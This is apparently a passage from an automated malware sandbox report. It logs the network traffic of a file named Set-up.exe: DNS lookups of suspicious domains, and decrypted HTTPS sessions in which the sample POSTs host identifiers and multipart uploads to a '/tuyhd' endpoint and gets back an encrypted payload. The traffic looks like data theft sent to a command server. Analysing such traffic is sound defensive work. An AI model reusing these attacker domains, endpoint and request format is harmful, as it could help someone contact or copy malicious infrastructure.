Apr 13, 2025 20:22:54.994081974 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:54.994110107 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:54.994126081 CEST	49702	443	192.168.2.5	104.21.48.1
Apr 13, 2025 20:22:54.994132042 CEST	443	49702	104.21.48.1	192.168.2.5
Apr 13, 2025 20:22:55.142674923 CEST	49703	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.142736912 CEST	443	49703	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.142875910 CEST	49703	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.143254042 CEST	49703	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.143269062 CEST	443	49703	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.354835033 CEST	443	49703	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.432873011 CEST	49704	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.432935953 CEST	443	49704	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.433065891 CEST	49704	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.446302891 CEST	49704	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.446350098 CEST	443	49704	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.662384033 CEST	443	49704	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.672600985 CEST	49705	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.672641993 CEST	443	49705	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.672736883 CEST	49705	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.688328028 CEST	49705	443	192.168.2.5	89.169.54.153
Apr 13, 2025 20:22:55.688369036 CEST	443	49705	89.169.54.153	192.168.2.5
Apr 13, 2025 20:22:55.688443899 CEST	49705	443	192.168.2.5	89.169.54.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 13, 2025 20:22:28.942398071 CEST	49582	53	192.168.2.5	1.1.1.1
Apr 13, 2025 20:22:29.049541950 CEST	53	49582	1.1.1.1	192.168.2.5
Apr 13, 2025 20:22:39.788301945 CEST	53057	53	192.168.2.5	1.1.1.1
Apr 13, 2025 20:22:40.015295029 CEST	53	53057	1.1.1.1	192.168.2.5
Apr 13, 2025 20:22:54.998610973 CEST	51345	53	192.168.2.5	1.1.1.1
Apr 13, 2025 20:22:55.141660929 CEST	53	51345	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 13, 2025 20:22:28.942398071 CEST	192.168.2.5	1.1.1.1	0xd284	Standard query (0)	c.pki.goog	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:39.788301945 CEST	192.168.2.5	1.1.1.1	0x6890	Standard query (0)	jesxterplay.run	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:54.998610973 CEST	192.168.2.5	1.1.1.1	0x8165	Standard query (0)	h1.mockupeastcoast.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.48.38	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.55.18	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.55.35	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.48.24	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.48.36	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.48.18	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.48.40	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:28.383822918 CEST	1.1.1.1	192.168.2.5	0xf4c6	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.48.21	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:29.049541950 CEST	1.1.1.1	192.168.2.5	0xd284	No error (0)	c.pki.goog	pki-goog.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Apr 13, 2025 20:22:29.049541950 CEST	1.1.1.1	192.168.2.5	0xd284	No error (0)	pki-goog.l.google.com		172.253.124.94	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.48.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.112.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.32.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.64.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.80.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.96.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:40.015295029 CEST	1.1.1.1	192.168.2.5	0x6890	No error (0)	jesxterplay.run		104.21.16.1	A (IP address)	IN (0x0001)	false
Apr 13, 2025 20:22:55.141660929 CEST	1.1.1.1	192.168.2.5	0x8165	No error (0)	h1.mockupeastcoast.shop		89.169.54.153	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jesxterplay.run

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49692	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:40 UTC	265	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 79 Host: jesxterplay.run
2025-04-13 18:22:40 UTC	79	OUT	Data Raw: 75 69 64 3d 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 26 63 69 64 3d 36 33 37 62 35 35 32 37 39 30 32 31 61 61 62 33 33 32 37 38 31 38 38 63 66 61 36 33 38 33 39 37 Data Ascii: uid=05f2421b9a2aede80b678d2b5cf0c001e20aa8&cid=637b55279021aab33278188cfa638397
2025-04-13 18:22:40 UTC	792	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:40 GMT Content-Type: application/octet-stream Content-Length: 38677 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EAoBDeEsfq%2BDRPLnfr2mn0jbLB3T%2F3dv0jU5u43Yb3vDJUX1PYe11USooi%2BMlheiL7YnGpeAHDKYy95Q%2BfYohwfd1u%2FPi6xJ2P38gU%2Fw7DIg176TgZ1TGwpB3e9oTBIIQ4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfd7ec8747be1-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=106104&min_rtt=106078&rtt_var=22416&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3049&recv_bytes=980&delivery_rate=38036&cwnd=250&unsent_bytes=0&cid=e6e0dd6a78161abd&ts=578&x=0"
2025-04-13 18:22:40 UTC	577	IN	Data Raw: dd fc 8d 6f 03 e0 62 ba 73 9d b3 7f 8d 54 da bf 50 0f f2 19 87 97 67 9a 37 50 b7 9c 0a 33 51 da 20 0c 76 07 14 d8 b3 df c9 29 2e e2 1a 86 a7 c9 77 72 b3 85 02 a6 bc fc b7 17 1a a1 f3 16 4f eb 6e b2 b8 7e 25 eb 35 0f 8a da fb 11 6c e9 c3 00 7a 68 e4 21 8a e0 22 61 8b ab de b7 1a ad ec aa 49 f7 79 41 10 bb 61 a8 67 30 17 b3 1c 0d 4b aa 50 70 8d 3f d7 fe ce e0 d4 d2 04 3f 99 67 7b a9 eb 0c 2a 79 50 c9 30 b6 93 a6 41 56 e9 67 b1 44 ef d4 e3 86 43 3e cc 6b bc 92 12 c5 c2 51 35 56 ac f1 bc 37 cc 09 bb fb 6a bd b4 79 25 36 29 ed 7f 7b 92 e3 94 d4 71 20 c6 a8 6f cb 7a fd 99 ee f7 22 66 bf ca 1d 25 01 55 77 26 7f 3f 43 92 aa 1a d4 b6 84 c8 9d 97 ef 13 23 17 66 2d d2 02 5f e1 44 5d cf 06 92 4b 71 72 85 f5 9b cb 9a 8c 05 49 d8 72 14 66 47 4b c9 39 12 92 91 f6 0f 5f Data Ascii: obsTPg7P3Q v).wrOn~%5lzh!"aIyAag0KPp??g{*yP0AVgDC>kQ5V7jy%6){q oz"f%Uw&?C#f-_D]KqrIrfGK9_
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: 5d 4d d9 dc 9c 64 e6 6e 10 d9 e0 04 ac 31 4e 7c 8c ca 35 a0 1a 89 f9 b8 da 9e 7c 24 5e 03 9b 82 35 d1 a8 3f 02 09 c6 bd fa cd cc be fc 2c 9e ee 7a 06 09 88 ea 2d fd 81 17 83 83 89 18 d9 e4 d3 a6 ff ce 2c 3f 35 0d 42 e0 6d fe 88 3a aa cb a7 a8 8d 00 ad bd 9d 02 2b 55 1d e7 62 cc 63 ba ff ab 8c de 4c b8 2b 12 08 0d 28 4b 4c fe 2d 6e 36 27 5e 76 98 89 c9 ab 1e bb 66 07 df 5c 39 1f 0d b8 10 9f 14 07 28 78 88 5f a2 18 9c 49 e5 99 97 1e 3d 3e ac 67 aa 8e 61 82 b9 41 0c 53 46 35 b7 95 df 1d fc ed 88 e5 3f 49 0c 9e 32 fe e4 ea b3 69 5e 81 ea b3 ad 7a 1d 17 8e ec 91 ee 18 f2 c6 2b f7 14 f5 aa d6 d6 87 77 db 1a 06 b9 45 bc c1 c7 46 6a f6 dd 42 88 a6 44 7d 1b e5 c4 77 7b 48 ea 7c 81 c4 94 4a b8 0c 4b 28 a9 47 3b 96 7b 3f 2e 35 74 33 67 72 69 ae 02 2e 0d ed 0a 15 cd Data Ascii: ]Mdn1N\|5\|$^5?,z-,?5Bm:+UbcL+(KL-n6'^vf\9(x_I=>gaASF5?I2i^z+wEFjBD}w{H\|JK(G;{?.5t3gri.
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: 27 e7 75 14 25 c9 9a e6 25 47 01 76 1d 5d b2 1c 28 9c 6d 28 71 f6 c8 be e6 20 1f 1c 30 fa a7 2f 3f 12 10 32 11 16 ba 34 44 58 1e 3d 57 da 3c 9f ba aa 67 a7 2a d3 c9 4a 7d a0 a9 b4 c3 45 41 71 ad 24 d4 f6 96 56 7b ab 6a 15 db b5 be ac 2c 95 41 b0 a1 e0 65 77 c5 cb ed 77 c1 dc aa 27 cd 52 9a 8c 07 19 84 e6 31 54 eb 11 f5 16 61 2d 4c 99 f9 88 d1 02 a7 a8 f2 a8 3a 1b b7 50 df 51 21 fb 68 3d 31 8e ce ef c8 60 c8 d5 eb a0 bf e0 32 0d cc c0 a6 ea 74 df 0a e6 47 e3 f3 18 7b 09 83 5d 43 07 63 e8 87 03 52 03 e4 0d 3f c0 d1 6c 67 41 af 9c f5 73 5d f8 58 81 92 59 d1 1f 13 8d 08 76 48 9a 1f 9a d7 3a 87 3d e4 b3 03 08 08 ad 80 66 96 0b 20 6f e0 c6 2c 74 91 c0 01 f3 28 21 9a af 75 08 b4 ce c7 02 b7 55 bc 33 2e 05 9b 2a bb 89 d2 72 a6 3b 97 91 14 06 e6 76 fd 3c f1 07 d4 Data Ascii: 'u%%Gv](m(q 0/?24DX=W<gJ}EAq$V{j,Aeww'R1Ta-L:PQ!h=1`2tG{]CcR?lgAs]XYvH:=f o,t(!uU3.r;v<
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: 52 3b 23 73 35 76 af 7d 81 80 d4 0a ac ba 95 fd a6 c0 3b e7 c1 b9 f2 6a 48 56 07 ab 15 64 f2 fa 2d 9e b9 82 c1 14 07 e5 66 7d f7 f4 8b b3 a2 35 77 98 0a 87 9f 73 f9 a9 a0 e2 5e 9b aa f3 41 fa 8f e3 9f b5 70 f9 f2 f2 66 36 b1 d6 06 fb f8 bb 74 10 a0 a5 6f 15 2a b4 9e c0 8e bb 6c 06 61 3b 11 c2 35 4d f5 85 d2 8f d2 f9 18 2e ba 47 83 52 cf 5f 98 a4 04 4a 2a 82 95 5a dc 7b 56 5d ce 14 c3 28 01 c2 c4 2a 51 e2 f7 e8 23 66 75 5d 96 42 10 e9 d1 ad de 80 39 31 4e 54 c6 4d bb 28 9e b2 4c 32 e5 0e d8 f2 7a cd 75 65 78 bd b3 f6 10 f5 fe 9a 2e 00 03 f1 f0 46 e2 2e 32 62 03 0f 8a 36 24 4d 0a 35 c9 3a 76 e2 3f cb 2a e2 67 42 6a 10 06 6b 52 72 1b 30 83 64 e3 38 5d 6c 64 dd 2f 19 87 86 c3 4f 06 ea bd 50 6a 4c dc 73 99 c2 c5 d7 85 4b 41 00 e6 52 58 c6 27 6a 14 44 a9 bb 60 Data Ascii: R;#s5v};jHVd-f}5ws^Apf6tola;5M.GR_JZ{V](Q#fu]B91NTM(L2zuex.F.2b6$M5:v?gBjkRr0d8]ld/OPjLsKARX'jD`
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: b5 c0 9d 61 7a 1f b0 ad 69 85 3a 38 cb f5 05 7d ac ab 40 04 b2 68 22 c7 76 e7 88 5a aa 1b d3 ac 33 8f 5d 19 20 e7 17 b7 d5 42 56 8e 78 c7 0b ed a9 c9 96 9c 23 0a 82 62 df ae a9 c9 2e 4e 7f bb 98 c7 b1 e8 90 4e 13 ac b0 8a 76 66 1a 37 78 14 9e ec 9e da 54 d7 5d 91 e4 48 fc 55 c0 99 2e c3 9b 88 b1 40 a6 47 35 50 c5 f3 a1 49 9b fd da a7 81 ca 26 c3 aa f1 59 11 15 3a 71 20 c6 04 5b f8 3f bc fd 59 5d 26 ca c9 bc c0 e3 f6 ed 39 ce 46 1f 58 11 b0 b3 94 96 24 8a d6 e3 48 18 38 9d 98 54 f4 ac d5 64 c7 6e ab 7d 44 a9 fc 9e 02 32 60 57 dd 8c d8 65 5c 7e b1 99 eb d1 57 ac a4 ed b7 0b a0 0c 0b 24 99 50 13 de 4e 18 35 5c d7 5a dd 8d 62 ea d1 69 4f 72 cb 1a 1b 46 df cf 07 70 4f 4e 04 e9 09 fa 8f 2c 7b 3f 62 1d 0a 60 ac 46 72 f3 b4 d5 9e 69 dc 62 4d 87 51 06 b7 5f c5 fd Data Ascii: azi:8}@h"vZ3] BVx#b.NNvf7xT]HU.@G5PI&Y:q [?Y]&9FX$H8Tdn}D2`We\~W$PN5\ZbiOrFpON,{?b`FribMQ_
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: 3f 0b 1e e7 b4 45 21 0a 1b f6 d7 94 15 8d d8 73 1b a0 cd a5 2c 0f 44 02 7c 92 62 c0 62 dd ed bb 6d 83 41 5c 5e 8f 58 47 4f 0d 1c 0c b0 21 cc d5 a8 1b 25 6b f5 6a e6 56 8d b4 d9 89 07 94 f0 64 72 92 f7 99 68 f5 7f 54 85 c9 8c 26 51 a9 c9 21 78 52 2f fd e2 62 20 92 a9 97 ea 86 5c c5 aa bf 81 bb 36 f1 07 31 aa eb 7e 79 1b 72 ed 03 47 93 df d9 2d e0 60 cf bf 91 38 a5 7e 1f e6 7a 19 74 c7 69 61 08 d1 db 1f ed f1 d4 54 62 4a 26 2a d0 39 0d 54 f9 2f 09 a0 ab fd 91 e9 35 46 8e ae 05 fe 43 97 14 aa 3b ac d8 c1 4e b9 06 d5 02 ef a6 9c 06 da 85 c9 a4 fe 98 49 13 08 34 39 fb 36 d6 8c 7a 35 92 bd e5 7e 93 1a 27 25 3b e9 7a 67 a5 90 3f 7a 4d 1f 7f 15 fe 63 b6 8b 8c 36 0a 40 6b f3 25 e7 21 c2 2d b8 3c c4 8c da ee fa 76 96 13 38 0f f0 72 85 54 18 8c 84 ac 50 88 a7 ab 70 Data Ascii: ?E!s,D\|bbmA\^XGO!%kjVdrhT&Q!xR/b \61~yrG-`8~ztiaTbJ&*9T/5FC;NI496z5~'%;zg?zMc6@k%!-<v8rTPp
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: 29 fa b5 cd db 2f 87 97 f8 44 e4 ff fd 99 5a d2 b7 42 a1 4f fc 13 8d b5 20 e5 d5 4e 88 67 13 ff 60 42 7a 92 e5 3c 6f 61 4e 75 e4 85 fc 98 09 ff 03 2e 54 4c 98 d4 35 b1 f9 b6 5f b9 8e dd 6a e4 7c 8d c6 c3 f5 b8 3b d8 55 78 a9 7f 11 6d 59 33 65 fb 88 be f3 c3 79 a8 dd 72 ff 97 c5 5d af eb 5f 7e 6d ed de 8a c3 46 5d 86 af 4d a2 53 83 90 75 f1 ba 05 c3 f4 0a 84 68 90 23 f6 04 64 41 4e 42 7e 0e e7 31 5a d2 41 50 a8 e4 0c 14 18 2a 12 84 9a 9f e7 d0 a5 6c a1 d1 e0 29 32 8b 95 07 12 40 d1 ed fd e4 4b 9e 18 31 12 2e ee 22 74 c5 8f 22 27 52 87 59 cd 3d 66 6e 69 8a 9a 92 42 52 7c 9b ac e5 26 eb cc a8 2a d4 64 d5 dc d3 05 77 8d 80 09 04 aa 0c 6a 9e f7 b4 93 a6 0d b9 ca de 29 59 ab 88 df de 5d 2e 62 d0 33 9c 83 0e 56 a0 d6 35 fd 69 38 12 0c 0a 97 fd bc 43 09 e7 90 42 Data Ascii: )/DZBO Ng`Bz<oaNu.TL5_j\|;UxmY3eyr]_~mF]MSuh#dANB~1ZAPl)2@K1."t"'RY=fniBR\|&dwj)Y].b3V5i8CB
2025-04-13 18:22:40 UTC	1369	IN	Data Raw: 03 da 2d 55 9a e6 4f a5 54 74 50 10 a9 21 7d 44 14 73 0d 51 c9 ad b8 6c 79 18 10 8f 85 46 ad cd a3 2f 33 ca 98 05 ae 5f 8e 26 ed 78 9e 6c 07 22 28 69 08 1c 90 e7 2e ca 88 46 ba a2 7e 23 e9 d8 49 4f ea b3 3b 68 02 e2 bd 1b 0b 7f 85 b8 94 c7 ee fc 15 6c 65 0d bd 2e 02 36 34 e7 c9 e9 17 71 94 12 76 ba bd bd 24 97 2b f0 d7 7a e0 b9 c7 59 40 9a 91 44 64 75 08 44 12 7e 78 39 c7 02 48 65 a8 66 4c 1d de 61 a6 86 99 d0 77 90 8d ac 78 a6 dd 51 00 03 4b a1 18 b7 e3 aa 9f 96 c1 06 ed 88 3d 25 13 5f 84 29 ce e0 80 88 54 5f 89 e1 e4 6a 8b f7 50 8d 3a 32 a7 0a 61 f5 d9 22 32 a7 ec 47 96 8c 3f d5 4a 69 55 4d 24 d9 8c 5f cd d6 53 5b 7c 36 3e 05 c3 54 1a ab 1d 8e b5 6f 46 e8 b8 dd fb 04 cf 5d 50 bf 1e e1 cf c4 2e f8 fd 2f ad 36 5e 9b 8e af e0 09 c4 63 de 55 74 c2 a3 28 0d Data Ascii: -UOTtP!}DsQlyF/3_&xl"(i.F~#IO;hle.64qv$+zY@DduD~x9HefLawxQK=%_)T_jP:2a"2G?JiUM$_S[\|6>ToF]P./6^cUt(
2025-04-13 18:22:40 UTC	759	IN	Data Raw: 95 d9 db 7c c7 5d 7d c5 5c 68 d5 ea 54 1f f6 75 e4 d7 30 d5 cb c1 71 e1 f9 96 ba 3c 23 6c 97 37 26 bc 72 df 1f 8c 6c 1a bb b0 cf ad 2c 26 c1 09 30 04 1a 42 f2 99 bf c9 2f cb 31 db 6d ea f5 ce 17 ee 46 26 bb 2e 85 00 03 60 5c a7 bc 07 ef e2 b9 eb bb d2 c3 ca 87 ba 14 81 dd 4d e5 58 9e 7a 6a 96 9d 79 0e a5 08 b7 1c c1 57 12 e7 cf 31 8d 85 cd 29 ec 2c 6b 5c 21 3f 49 53 da c7 b9 0f 52 c7 33 29 14 53 06 e1 f9 57 60 e0 22 dd a6 6f 3b 56 a4 ca 80 c2 68 32 e1 00 2d 15 73 fb 92 c2 59 d6 f4 29 9b 58 be 18 54 e2 f8 ee 75 c1 84 e0 d3 0b 0f 9f 20 dd f4 a1 e7 0c 3b 92 65 75 e6 8e e1 15 c4 47 0a af 16 e9 fe 49 8a c6 60 c1 4e ef d3 7a 6a 50 69 64 80 d0 01 03 88 af e3 90 a7 5b b8 48 1e 2d e9 9d 0c f2 7c 91 db ec a2 82 83 71 96 69 ce 74 5d 6a 98 0f 9e ba 5a 7a ae 0e 18 c8 Data Ascii: \|]}\hTu0q<#l7&rl,&0B/1mF&.`\MXzjyW1),k\!?ISR3)SW`"o;Vh2-sY)XTu ;euGI`NzjPid[H-\|qit]jZz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49693	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:42 UTC	281	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SEYjzUhpQnn0KGfd User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 14909 Host: jesxterplay.run
2025-04-13 18:22:42 UTC	14909	OUT	Data Raw: 2d 2d 53 45 59 6a 7a 55 68 70 51 6e 6e 30 4b 47 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 0d 0a 2d 2d 53 45 59 6a 7a 55 68 70 51 6e 6e 30 4b 47 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 45 59 6a 7a 55 68 70 51 6e 6e 30 4b 47 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 45 35 33 45 35 31 30 43 42 38 42 Data Ascii: --SEYjzUhpQnn0KGfdContent-Disposition: form-data; name="uid"05f2421b9a2aede80b678d2b5cf0c001e20aa8--SEYjzUhpQnn0KGfdContent-Disposition: form-data; name="pid"2--SEYjzUhpQnn0KGfdContent-Disposition: form-data; name="hwid"EDE53E510CB8B
2025-04-13 18:22:43 UTC	816	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:43 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iepXfM%2B3CQbqRBCjVwMyLYzqBeoA5N%2BqRtqzB%2BV6DVL3UtqblkapKpGw5lt%2B487%2BNgumLJWaQJxweurG6MvnZJRPgT13w7qCJWLxQrQH3VCd0f6ddcoOQtV%2BeSMpgzPYpqU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfd8c2b3a31dd-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=125804&min_rtt=125769&rtt_var=26583&sent=11&recv=19&lost=0&retrans=0&sent_bytes=3048&recv_bytes=15848&delivery_rate=32078&cwnd=252&unsent_bytes=0&cid=b146953c34180be2&ts=688&x=0"
2025-04-13 18:22:43 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
2025-04-13 18:22:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49694	104.21.48.1	443	1564	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 18:22:43 UTC	273	OUT	POST /tuyhd HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=fAdIMMlE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 15018 Host: jesxterplay.run
2025-04-13 18:22:43 UTC	15018	OUT	Data Raw: 2d 2d 66 41 64 49 4d 4d 6c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 35 66 32 34 32 31 62 39 61 32 61 65 64 65 38 30 62 36 37 38 64 32 62 35 63 66 30 63 30 30 31 65 32 30 61 61 38 0d 0a 2d 2d 66 41 64 49 4d 4d 6c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 66 41 64 49 4d 4d 6c 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 44 45 35 33 45 35 31 30 43 42 38 42 44 39 38 44 45 45 41 41 31 46 37 41 45 34 35 42 33 30 46 0d 0a 2d 2d 66 Data Ascii: --fAdIMMlEContent-Disposition: form-data; name="uid"05f2421b9a2aede80b678d2b5cf0c001e20aa8--fAdIMMlEContent-Disposition: form-data; name="pid"2--fAdIMMlEContent-Disposition: form-data; name="hwid"EDE53E510CB8BD98DEEAA1F7AE45B30F--f
2025-04-13 18:22:44 UTC	808	IN	HTTP/1.1 200 OK Date: Sun, 13 Apr 2025 18:22:44 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ru%2BYXPlFlR92dn6cT6TTiPbvDt3FX1ksMwk9oadgmYLZ4gJiONAjVvWK8rt%2FBiiNRlD499cE4EH5OaAzRe4BKWsh19oSZGT4E5iddojf4HBCjALv44TmDMt5KcT6CoRN35Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 92fcfd9409b9d673-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=124489&min_rtt=124353&rtt_var=26439&sent=11&recv=19&lost=0&retrans=0&sent_bytes=3049&recv_bytes=15949&delivery_rate=32360&cwnd=252&unsent_bytes=0&cid=91c96be748273be9&ts=643&x=0"
2025-04-13 18:22:44 UTC	76	IN	Data Raw: 34 36 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 31 22 7d 7d 0d 0a Data Ascii: 46{"success":{"message":"message success delivery from 89.187.171.161"}}
